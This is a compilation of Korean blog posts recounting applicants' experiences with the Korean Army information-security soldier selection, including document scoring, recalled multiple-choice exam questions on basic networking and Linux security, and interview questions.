면접관님은 웃음이 터지셨고 알았다고 나가보라고 하셨다.

정보보호병 2차 면접은

기술면접과 인성면접으로 나누어져 있다.

기술 면접은 보안의 대한 경험 이 중요하며,

자신만의 특별한 필사기 던져

필살기 안에서 질문이 나올 수 있도록 노력 한다.

인성 면접은 당황하지 말고 차분하게

자신의 의견을 말할 수 있도록 노력한다.

최종 합격

위 과정을 통해 결국 필자는 정보보호병 합격에 성공했다.

최종 점수는

57.5 점.. 36등 정말 아슬아슬했다.

1차랑 합산되어 평가됨으로 가산점을 절대 무시할 수 없다.

그래도 다행이다.

국방의 의무 잘 마치고 오겠습니다!

충성!

도움 주신 정재훈, 유재겸 선배님께 감사합니다.

728×90

면접 문항 및 질문 정리 (2021.01.28)

개요

군 문제는 대학을 진학함과 동시에 고민하게 되는 부분이다. 본인은 컴공으로 입학했을 때부터 전공을 살려 군 복무를 하는 방법을 알아봤었는데, 산업기능요원으로 빠지는 방법을 제외한다면 SW 개발병과 정보보호병이라는 두 병과가 있었다.

SW 개발병의 경우, 상대적으로 소수의 인원을 뽑고 무조건 좋은 곳(?)으로 배치되는 것 같다. 반면 정보보호병의 경우 상대적으로 많은(매년 150명 정도인 듯 하다) 인원을 선발하는 대신, 배치되는 부대에 따라 열악한 환경에서 근무하게 될 수도 있다고 한다. 하는 일 또한 상당히 차이가 있는데, SW 개발병의 경우 군 관련 SW를 유지/보수/개발한다고 하며, 정보보호병의 경우 CERT에 들어가서 관제 업무를 주로 하게 된다고 한다. 본인은 아직 입대는 커녕 합격도 하지 않은 평범한 대학생이므로, 두 병과에 대해 더 자세히는 잘 알지 못한다. ‘정보보호병 후기’와 같은 키워드로 검색하면 많은 자료가 있으므로 추가적인 정보를 원한다면 이미 다녀오신 분들의 후기를 찾아보는 것을 추천한다.

SW 개발병의 경우, 컴공이 ‘직접학과’로 분류되며 하는 일 또한 개발 업무이기에, 컴공이 ‘간접학과’로 분류되고 나에게 일 또한 생소한 정보보호병보다 매력적으로 느껴졌다. 그래서 2020년 11월의 SW 개발병 모집에 지원했었는데, 학년도 낮고 자격증도 정보처리기능사 하나였기에 떨어지게 되었다. 이 때 점수가 4점가량 모자랐었는데(컷 37, 본인 33), 3학년을 수료하며 정보처리산업기사까지 획득한다면 합격권에 들어올 것 같았다. 하지만 애초에 산업기능요원으로 빠지지 않고 육군을 가려는 이유가 빠른 군 문제 처리라는 장점에 있었기에, SW 개발병의 다음 회차 모집을 기다리지 않고 2020년 12월의 정보보호병 모집에 지원하게 되었다. (2021년 1월 면접, 2021년 3월 입대 예정)

사실 SW 개발병을 목표로 하고 있었던지라, 정보보호병에 지원해 준비하게 된 일은 다소 갑작스럽기도 했다. 내 전공 또한 정보보안이 아닌 컴공인지라 이쪽 내용에 대해서도 무지한 상태였다. 하지만 정보보호병 지원과 면접 관련 검색을 통해 수많은 블로그 글들과 후기들을 접할 수 있었고, 덕분에 무난하게 면접까지 마칠 수 있었던 것 같다. 본인 또한 가까운 미래에 정보보호병을 지원하고자 하는 다른 사람들에게 도움이 되고자 이 글을 작성한다.

블로그 글 중에서 제일 도움이 되었던 것들은 구체적이고 개인적인 경험이 담겨있는 글들이었다.

따라서 본인 또한 이러한 부분에 초점을 맞추어 후기를 남기고자 한다.

서류 지원

전체적인 평가는 다음 표와 같이 이루어진다:

전공학과 의 경우, 간접학과 2학년 수료로 16 점 을 받았다. (아직 수료가 아니었지만, 문의 후에 ‘수료예정증명서’를 제출하였다.)

의 경우, 간접학과 2학년 수료로 을 받았다. (아직 수료가 아니었지만, 문의 후에 ‘수료예정증명서’를 제출하였다.) 고교출석률 은 10 점 을 받은 듯 하다.

은 을 받은 듯 하다. 경력 은 정보보안/SW 관련 근무 경험, 동아리 활동 혹은 수상을 통해 인정받을 수 있는데, 급하게 지원하느라 동아리 활동 증빙 서류가 없어서 받을 수 있었던 2점가량을 놓쳤다. 하지만 ‘정보통신분야 기능경진대회(정부부처주관)’ 항목으로 고등학교 2학년 때 수상했던 ‘정보올림피아드 공모전’ 은상을 등록하여 6 점 을 챙길 수 있었다.

은 정보보안/SW 관련 근무 경험, 동아리 활동 혹은 수상을 통해 인정받을 수 있는데, 급하게 지원하느라 동아리 활동 증빙 서류가 없어서 받을 수 있었던 2점가량을 놓쳤다. 하지만 ‘정보통신분야 기능경진대회(정부부처주관)’ 항목으로 고등학교 2학년 때 수상했던 ‘정보올림피아드 공모전’ 은상을 등록하여 을 챙길 수 있었다. 자격증은 정보처리기능사가 있다. 두시간 공부해서 딴 자격증이 무려 16 점이다.

합산하여 16 + 10 + 6 + 16 == 48 점의 서류점수이다. 서류 지원 결과는 다음과 같았다:

놀랍게도 정올 공모전 없이도 합격권이다. 대부분 대학교 2학년 정도에 자격증을 하나 따고 지원하는 듯 하다. 다만 시상내역이 있었기에 높은 선발순위를 받을 수 있었다. 서류점수는 최종 점수에도 반영이 되기에, 합격을 하게 된다면 이 시상내역 덕분일 것 같다.

이번 달에는 20명의 정보보호병을 뽑기에, 2배수인 40명이 면접을 보게 된다. 이번 달 전체 지원자는 128명이었기에, 6.4대 1로 경쟁률이 다소 높은 편인 듯 하다.

면접

배점 100점 중 30점에 해당하는 면접이다.

사실상 이 후기를 쓰게 된 이유가 면접에 대한 정보를 남기고자이다.

본인은 면접을 준비하는 과정에서 최소 10개의 후기는 본 것 같은데, 덕분에 이미 겪어본 듯한 착각 속에서 편하게 면접을 진행할 수 있었다. 사실 면접을 진행하면서도, 블로그에 후기를 남길 생각에 문항들을 최대한 자세히 기억해두려고 노력했었다. 덕분에 이 후기를 읽는 님들은 면접 문항 복원률 100%의 풍성한 후기를 보게 될 예정이다.

참고로 면접은 1. 객관식 시험, 2. 인성/적성 면접, 3. 기술면접의 순서로 구성된다.

차편을 예약하거나 시간 계획을 세울 사람들을 위해 알려주자면, 시험은 1시부터 15분간 응시하며, 면접은 1시 25분부터 2시 정도까지 대기하였다. 본인이 9번이고, 35분 걸렸으니, 인당 4분가량씩 걸린다고 보면 될 듯 하다.

면접 전

정보보안에 대해서는 아는게 거의 없는지라 공부를 좀 했다. <정보 보안 개론> 책을 사서 전날에 1회독하고 갔는데, 어느 정도 도움이 됐다. (다만 저 책은 내용이 생각보다 별로라고 느껴져서 딱히 추천하지는 않는다.)

다른 면접 후기들을 읽으며 시험과 면접 예상문제에 대한 준비를 했다.

면접 당일

먼저 면접장까지 가는 과정과 대기하는 과정 얘기를 짧게 하겠다.

본인은 서울역에서 대전역까지 KTX를 탔고, 지하철을 이용해 면접 장소인 병무청까지 이동했다.

오후 1시 면접이었는데, 선착순으로 번호표를 접수하기 때문에 일찍 갈수록 좋다. 본인은 11시에 도착하였고, 9번째 번호표를 뽑았다.

면접장은 위의 오른쪽 사진에 나온 건물이 아닌, 건너편 건물(도로에서 봤을 때 오른쪽)에 위치한다. 주차장 안쪽으로 돌아 들어가도록 되어있는데, 도착하면 2층에서 번호표를 뽑고 대기하게 된다. 어디 나가서 밥 먹기도 귀찮았고 공부도 해야할 것 같아서 그냥 1시까지 계속 앉아있었다.

객관식 시험

10 문항이고, 4지선다이다. 면접장에서 얼핏 들은 내용에 의하면 무려 전체 면접 배점의 절반(50%)이라고 한다.

문항은 다음과 같다:

1. 클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

2. 다음 중 전자상거래와 관련이 없는 것은?

-> ebXML, SET, SSL, EMV가 선지였다.

3. chmod 명령어의 특징이 아닌 것은?

-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다.

4. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다.

5. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다.

6. 리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다.

7. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ

8. 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다)

9. 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다.

10. 침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)

-> False Negative라고 답했는데, 맞을지 모르겠다.

1, 2, 4, 5, 6, 8은 찍었고, 9, 10은 추론했고, 3, 7은 확신을 갖고 답했다.

시험 종료 후 구글링을 해본 결과, 2, 4는 확정적으로 틀렸으니, 8개 혹은 7개를 맞혔을 것이다.

이 중 정보보안개론을 공부하여 도움이 되었던 문항은 2번, 5번 두개밖에 없었는데 심지어 2번은 틀렸다 ㅋㅋㅋ

음… 분명 공부를 해야 하는 것은 맞는 시험인데, 어쩌다 보니 대량으로 찍게 되었다. 그래도 찍은 문항 수에 비해 많이 틀린 것 같지는 않아서 다행이다.

인적성 면접

인적성 면접과 기술 면접의 순서는 정해져 있지 않다. 본인은 인적성 면접을 먼저 보게 되었다.

면접 내용에 대해 이야기하기 앞서서 잠깐 하고 싶은 말이, 면접 대기 queue를 왜 그렇게 해놓았는지 모르겠다. 진행해야 하는 면접은 각각 4분 정도씩의 두개인데, 제일 효율적으로 진행하는 방법은 pipelining 하듯이 그냥 하나의 줄을 세워서 면접 1, 면접 2를 순서대로 진행하는 방법일 것이다. 이렇게 하면 4분마다 1명의 throughput이 된다. 하지만 면접장에서 진행했던 방법은, 면접 1을 보는 줄과 면접 2를 보는 줄을 분리시켜서, 일부는 면접 1의 줄에 먼저 서게 하고, 나머지는 면접 2의 줄에 먼저 서게 한 것이다. 각 면접을 마친 사람은 다시 자신이 아직 보지 않은 면접의 줄에 합류하게 된다. 왜 하는건지 알 수 없는 이런 면접 대기 방식 덕분에, 각 줄에 대기하는 사람 수가 늘어났다 줄어들었다 하면서 앉을 자리가 부족했다가 남았다가를 반복하게 되었다. 자리가 남았을 때, 대기 줄에 가서 앉아야 할지의 여부 또한 눈치싸움이 되었다. 예를 들어 면접 1의 대기 줄에 빈자리가 났다. 하지만 여기에 아직 면접을 보지 않은 사람이 앉아버리면, 현재 면접 2를 먼저 보고 있는 사람이 면접이 끝나고 나왔을 때, 앉을 자리가 없어져 버린다. 이렇게 진행하면 throughput이 늘어날 것이라고 생각한 모양이다;;

면접은 젊은 남성 면접관님이 진행하셨고, 매우 친절하게 진행하려 노력하는 것이 보였다.

그럼 면접 내용이다:

=> 정보보호병에 지원한 이유는 무엇인가?

=> 정보보호병이 무슨 일을 하는 것인지 알고 있는가? (관제 업무인 것을 알고 가면 된다.)

=> 시설이 생각하는 것보다 열악할 수 있다. 괜찮겠는가? (뭐 어쩌겠어… ㅋㅋㅋ)

=> 근무 스케줄이 빡셀 수 있고, 8시간씩 모니터를 봐야 한다. 괜찮은가? (네…)

=> 정보보호병은 간부와의 접촉이 타 병과보다 많다. 부당한 지시가 내려올 경우 어떻게 하겠는가?

=> 사회활동 / 봉사활동 경험이 있는가?

=> 대한민국의 주적은 누구인가?

=> 가족관계가 어떻게 되는가?

본인의 대답은 개인적인 내용이 많으므로 생략하겠다. 사실 면접을 대기하면서 긴장이 안되는 듯 해서 이게 정말 긴장을 안하고 있는건가 싶었었는데, 면접실에 들어가보니 정말 긴장을 안하고 있더라. 엄청 자연스럽게 대답을 잘 할 수 있었던 것 같고, 면접관님은 (계속 긴장을 풀어주려고 노력하시는 것이겠지만) 나무랄 것 없이 완벽하게 대답했다고 말씀하셨다.

기술 면접

다른 후기에서 말하기를, 필기시험을 보게 된 이래로 기술 면접에서 기술적인 내용을 덜 물어본다고 한다.

실제로 질문받은 내용은 본인의 경험 관련된 것이 대부분이었다.

기술 면접은 여성 군인분이 진행하셨다.

그럼 면접 내용이다:

=> 정보보호병에 지원한 이유는 무엇인가? (다시 질문받았다)

=> 수상 경력이 있다. 어떠한 내용인가?

=> 생각하는 것 만큼 멋진 일이 아닐 수 있다. 알고 있느냐?

=> 최근 관심 있는 보안 분야/이슈가 있느냐?

=> 합격할 경우 (공부) 계획이 있느냐?

수상 경력 관련 질문에 대답할 때에는, 대전에서 진행되었던 정보올림피아드 캠프 당시를 떠올리며, 그 이후 3년 반만에 대전에 왔다고 설명하며 자연스럽게 당시 출품작에 대한 설명을 진행하였다. 관련된 추가 질문들(e.g. 어떤 언어를 썼느냐)을 대답하였고, 자연스럽게 다음 질문들로 넘어갔다.

관심 있는 보안 이슈는, 2018년의 Meltdown / Spectre 취약점 이야기를 했다. 학교에서 배운 컴퓨터구조 내용(branch prediction 등)과 엮어서 대답하니 흡족해 하셨다.

합격할 경우의 계획은, 군대에 가서 공부하고 싶은 분야들(정보보안 관련 + 수학)로 대답하였다.

면접 이후

그냥 집에 가면 된다. 코로나 때문에 2주가 연기되기도 했던 면접이라 정말 한참동안 기다렸었는데, 깔끔하게 해결하고 나니 마음이 한결 가벼워졌다. 서류가 6등이고 면접이 무난했던지라, 합격을 기대하고 있다.

결과

결과는 아직 나오지 않았다. 합격 여부가 발표되는대로 이 글에 추가하도록 하겠다.

UPD 1) 결과가 나왔다 – 시험에서 두 문항을 틀리고, 면접에서 아주 작은 감점 정도가 있었다면 설명되는 점수이다:

UPD 2) 정보보호병은 후반기 교육 2주차에 자대배치 결과를 받는다. 훈련소에서 면접을 보는 일부 부대 선발 인원을 제외하면, 나머지 인원의 배치는 편제가 비는 사단 이상급 부대로 완전히 무작위로 이루어진다.

본문에 쓰지 못한 내용에 대해 추가적으로 궁금한 적이 있다면, 개인적으로 연락주세요!!

정보보호병 면접 후기

2020-07-20 육군 정보보호병 면접

보통 2학년이 끝나고 정보보호병을 가는게 일반적이지만

bob 9기에 떨어진 충격으로 2학년 1학기를 마치고 지원하게 되었다.

서류전형에서 획득한 가산점은 다음과 같다.

정보보호학과 2학년 1학기 수료 = 16점

고교 출석률 결석 0일 = 10점

KISA 추천 동아리 활동 1년 이상 = 4점

자격증 여부 없음(기본) = 10점

최종 16+10+4+10 = 40점

서류에서 받을 수 있는 점수는 최대 70점으로

전공학과 수료기간이 길거나

대회 수상 경력이 있거나

관련 자격증을 가지고 있다면,

높은 배점을 받을 수 있다

( KISA추천 동아리 – Security Factorial 가산점만으로도 붙을 수 있을까! )

* 2021년 이후로 서류심사 부분 ‘경력’ 이 수정됨에 따라

더이상 동아리활동 가산점은 없습니다

병무청에서 확인가능

필기+면접으로 28위 안에 들어야 정보보호병을 갈 수 있다!

( * 회차마다 다르며 기준이 조금씩 변경되므로 잘 확인하자)

그리고 1차를 합격하게 되면 2차 면접을 보러가게 되는데

면접장에서는 필기 시험과 면접을 보게된다.

인생에서 3번째 면접이였다…

도착하고나서 번호표를 뽑게 되는데

꼭 꼭 꼭 면접 시간 2시간~1시간 30분 전에 가는걸 추천한다

이 번호 순서대로 수험번호 인증과 면접을 하게 된다.

면접이 1시 시작이라고 해서 30분전에 갔다가는

대기번호 40번대를 받고 면접 대기 2시간동안 멍때리는 수가 있다.

차라리 필기시험 공부를 2시간 하는게 1억 5천만배 낫다고 생각한다.

# 필기

참고로 나는 필기시험 준비를 인터넷 검색을 통해 대충 공부한 관계로

(검색창에 정보보호병 필기 검색해서 나온 문제 10개만 보고 갔다.)

10문제 중에 단 2문제만 이해한 사람이다.

도착한 사람들은 시험전에 책과 모의시험지를 통해 공부를 하고 있었는데

나는 그러한 정보가 없었기에 친구와 수다떨다가 시험을 치뤘다.

주로 리눅스와 관련된 문제와

(ex. 다음 중 해당 폴더와 관련된 내용으로 올바르지 않은 것은? 4지선다 형식)

네트워크 문제 + 보안관련 문제가 나왔다

(ex. 네트워크 7계층 + TCP 4계층관련 문제, 정보보안기사 문제)

사용해보지도 않은 것들이 나와서 깔끔히 말아먹었다.

그 중에 기억나는 문제 하나가 있다면

비정상적인 일이 발생할 수 있는 가능성을 뜻하는 용어를 고르시오.

① 위협 ② 위험 ③ 취약점 ④ ???

답은 ②인데 이런 용어설명 또는 이론을 제대로 찾아본 적이 없어서 당황했다.

취약점도 비정상적인 일이 발생할 수 있는거 아냐?

# 면접

동아리 면접말고는 면접 경험이 없는 나에게 제일 부담되었다.

그래서 딱 하루동안만 준비했다 (?)

각종 검색을 통해서 면접 질문들을 적어보고 답변을 작성하는 식으로 준비했다.

그런데 이번 면접에서는 질문이 너무 없어서 당황했다.

인성 면접과 기술 면접, 이렇게 2개를 보게 되는데

첫번째 인성 면접에서는 면접관님께서 정보보호병이 힘들거라는 이야기만 해주시다가

“정보를 찾아봐서 알겠지만 훈련소 수료이후에 무작위로 배치되게 되는데 사단급에 배치될 경우에

당신이 생각하는 정보보호병 업무와는 다른 일을 하게 될 수도 있다. 괜찮은가?”

“정보보호병 인원이 적어서 힘들 수도 있다. 괜찮은가?”

“북한에 대해 어떻게 생각하는가?”

정확히 3개의 질문과 함께 인성면접은 종료되었다.

대부분이 단답형식으로 말할 수 밖에 없는 속도로 말씀하셨다.

두번째 기술 면접은 인성 면접보다는 많은 질문을 해주셨는데

주로 자기소개 내용과 가산점을 받은 활동에 대해 질문을 하셨다.

“왜 정보보호병에 지원하게 되었고, 꼭 수료하고 싶은 이유가 있는가?”

“정보보호병이 되면 다양한 경험을 할 수 있을 수도 있지만,

그렇지 못한 경우가 발생할 수도 있다. 괜찮은가?”

“정보보호병은 인원이 적기 때문에 1~2명씩 휴가를 나가기만해도 타격이 크다.

때문에 휴가가 취소될 수도 있고, 때문에 밤샘을 자주 하게될 것이다. 자신있는가?”

“관심있어하는 보안 분야는 어떤 분야인가?”

“현재 동아리는 어떤 활동을 하는 동아리인지 설명할 수 있는가?”

“동아리 내에서 프로젝트를 해본 경험이 있는가?”

이 외에도 대답에 대해 간단한 꼬리질문이 이어졌다.

그리고 한가지 특징은 계속 눈을 마주치면서 질문을 하셨다.

공통적으로는 사단급 배치에 대해 감수할 수 있겠느냐 라는 질문과

주로 관제업무이기 때문에 밤샘을 할 수 있겠느냐 라는 질문을 해주셨다.

나는 사단과 군단차이를 몰라서 찾아봤었는데

사단은 군단보다 작은 규모이고,

정보보호체계가 제대로 수립되지 않아서

정보보호병으로써의 역할을 다하지 않는다고 한다.

* 2021-01-02

정보보호병 동기들마다 면접 질문이 달랐다고 한다

(용어의 개념 질문을 받은 동기가 있는 반면,

잘할 수 있지? 라는 질문만 받은 동기도 있었다)

이후에 대전까지 온 돈이 아까워서 은행동을 뽈뽈 돌아다니다가 집에 갔다.

은행동에는 성심당 본점이 있는데 유명한 빵집이라고 한다.

거기 튀김 소보루가 맛있었다.

빵은 사진찍을 생각도 못한채 다 먹어버려서 사진이 없다.